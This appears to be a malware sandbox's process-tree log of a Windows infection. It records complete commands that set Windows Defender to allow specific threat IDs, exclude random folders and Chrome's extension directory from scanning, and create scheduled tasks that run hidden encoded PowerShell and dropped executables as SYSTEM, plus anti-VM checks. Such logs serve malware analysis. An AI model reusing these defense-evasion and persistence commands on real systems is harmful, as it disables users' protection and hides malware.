C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:5764
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:5132
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:5732
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:5648
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:5552
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:5560
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:5572
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:5264
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:5292
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:4628
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:4488
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:5800
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:5940
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:5964
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:5984
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
PID:5880 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:323⤵PID:2328
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:324⤵PID:1252
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:643⤵PID:5668
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:323⤵PID:5596
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:643⤵PID:5640
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:323⤵PID:5796
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:643⤵PID:6116
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:323⤵PID:5340
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:643⤵PID:2196
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:323⤵PID:3856
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:643⤵PID:2728
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:323⤵PID:5400
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:643⤵PID:5472
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:5324
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:4652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:323⤵PID:5308
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:643⤵PID:1512
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:323⤵PID:4816
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:643⤵PID:4432
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gxTcKWwzR" /SC once /ST 01:00:21 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:4804
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gxTcKWwzR"2⤵PID:5072
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gxTcKWwzR"2⤵PID:5936
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 11:26:46 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\CotgOgQ.exe\" GH /SvWcdidgG 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5324
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "XyyyteIMwZeutaZuw"2⤵PID:4620
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
PID:5208 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:5144
-
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:6092
-
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:5920
-
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exeC:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5864
-
C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exeC:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe1⤵
- Executes dropped EXE
PID:5540
-
C:\Users\Admin\AppData\Local\Temp\7zS80E3.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS80E3.tmp\Install.exe it /yGTdiduRiv 385118 /S1⤵
- Executes dropped EXE
PID:1392 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:5636
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵PID:5568
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:5300
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:5292
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵PID:5264
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵PID:5800
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:2884
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵PID:4428
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵PID:5948
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:6112
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵PID:4192
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵PID:4552
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:5388
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:5996
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵PID:5960
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5224 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵PID:2056
-
-
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5376 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:5556
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:2216
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:3044
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:3660
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:6112
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:5948
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:4428
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:6000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:5940
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:2180
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:2868
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:5620
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:5404
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:4772
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:1076
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:5480
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:4268
-
-
